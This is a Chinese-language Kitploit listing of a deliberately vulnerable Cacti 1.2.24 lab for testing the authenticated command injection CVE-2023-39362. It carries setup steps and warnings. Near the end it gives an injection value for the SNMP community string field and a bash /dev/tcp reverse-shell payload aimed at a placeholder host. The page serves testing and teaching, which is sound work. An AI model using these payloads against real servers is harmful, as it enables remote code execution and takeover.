Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cacti-rce-snmp-options-vulnerable-application — 警告:这是一个存在漏洞的应用程序,用于测试 Cacti 命令注入(CVE-2023-39362)的漏洞利用。请自行承担运行风险! | Kitploit
工具/GitHubGitHub/m3ssap0/cacti-rce-snmp-options-vulnerable-application
漏洞分析漏洞利用Web应用程序漏洞利用命令与控制学习与教育实验室与实践
GitHubm3ssap0/cacti-rce-snmp-options-vulnerable-application

cacti-rce-snmp-options-vulnerable-application

警告:这是一个存在漏洞的应用程序,用于测试 Cacti 命令注入(CVE-2023-39362)的漏洞利用。请自行承担运行风险!

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库网站
1年前尚未审核

Cacti v1.2.24 认证命令注入(CVE-2023-39362)漏洞应用程序

这是一个用于测试 Cacti 漏洞(CVE-2023-39362)攻击程序的漏洞应用程序。

警告!

此应用程序包含严重的安全漏洞。运行风险自负!建议使用经过备份且隔离的环境(例如具有近期快照和仅主机网络(host-only networking)的虚拟机)。请勿将此应用程序上传到任何面向互联网的服务器,否则它们将被入侵。

免责声明: 我对任何人使用此应用程序的方式不承担任何责任。此应用程序的唯一用途是作为 CVE-2023-39362 漏洞攻击程序的测试场景,不应被恶意使用。如果你的服务器因安装此应用程序而被入侵,这不是我的责任,而是上传并安装它的人的责任。

漏洞信息

  • CVE 编号: CVE-2023-39362
  • 链接: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39362
  • 描述: 在 Cacti 1.2.24 中,在某些条件下,经过认证的特权用户可以在设备的 SNMP 选项中使用恶意字符串,执行命令注入并在底层服务器上获得远程代码执行。

用法

以下是搭建环境的步骤:

  1. 运行 docker compose up -d 启动容器编排。
  2. 您可以通过访问 http://127.0.0.1/cacti 来完成后续步骤,启动 Cacti 初始化向导。如果出现与数据库相关的错误,只需稍等片刻然后刷新页面。
  3. 默认凭据为 admin/admin。
  4. 在向导过程中对所有按钮点击 "下一步",并相应选择选项。所有默认设置应该都没问题,所有必需的先决条件都应满足。
  5. 安装完成后,以 admin 身份登录。
  6. 转到 "控制台" > "配置" > "用户"。
  7. 点击 guest 用户。
  8. "启用" 该用户,设置密码,如果需要,禁用 "下次登录时必须更改密码"。
  9. 点击 "保存" 按钮。
  10. 转到 "权限" 部分。
  11. 在 "常规管理" 下,启用 "控制台访问" 和 "站点/设备/数据"。
  12. 点击 "保存" 按钮。
  13. 注销并以 guest 身份重新登录以尝试漏洞利用。

该容器将被命名为 vuln-cacti。

测试 SNMP 设备的主机名为 monitored_snmp_device。

要拆除环境,请使用 docker compose down 命令。

Cacti 的官方安装指南可在此处找到。

根本原因

该漏洞的详细根本原因可在原始安全公告或我的博客文章中查看。

漏洞利用

(这只是一种可能的漏洞利用)

  1. 转到 "控制台" > "创建" > "新建设备"。
  2. 创建一个支持 SNMP 版本 1 或 2 的设备。
  3. 确保该设备拥有使用以下一个或多个模板的图形:
    • "Net-SNMP - 组合 SCSI 磁盘字节"
    • "Net-SNMP - 组合 SCSI 磁盘 I/O"
    • (从模板 "Net-SNMP 设备" 创建设备即可满足图形前提条件)
  4. 在 "SNMP 选项" 中,对于 "SNMP 团体字符串" 字段,使用类似这样的值:public\' ; touch /tmp/m3ssap0 ; \'。
  5. 点击 "创建" 按钮。
  6. 检查 /tmp 目录下是否存在已创建的文件。

要获得反弹 shell,可以使用类似如下的有效载荷。

root@kitploit:~
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'

作者

  • Antonio Francesco Sardella - 漏洞报告者 - m3ssap0

许可证

本项目使用 Unlicense 许可证授权 - 有关详细信息,请参阅 LICENSE 文件。

下载工具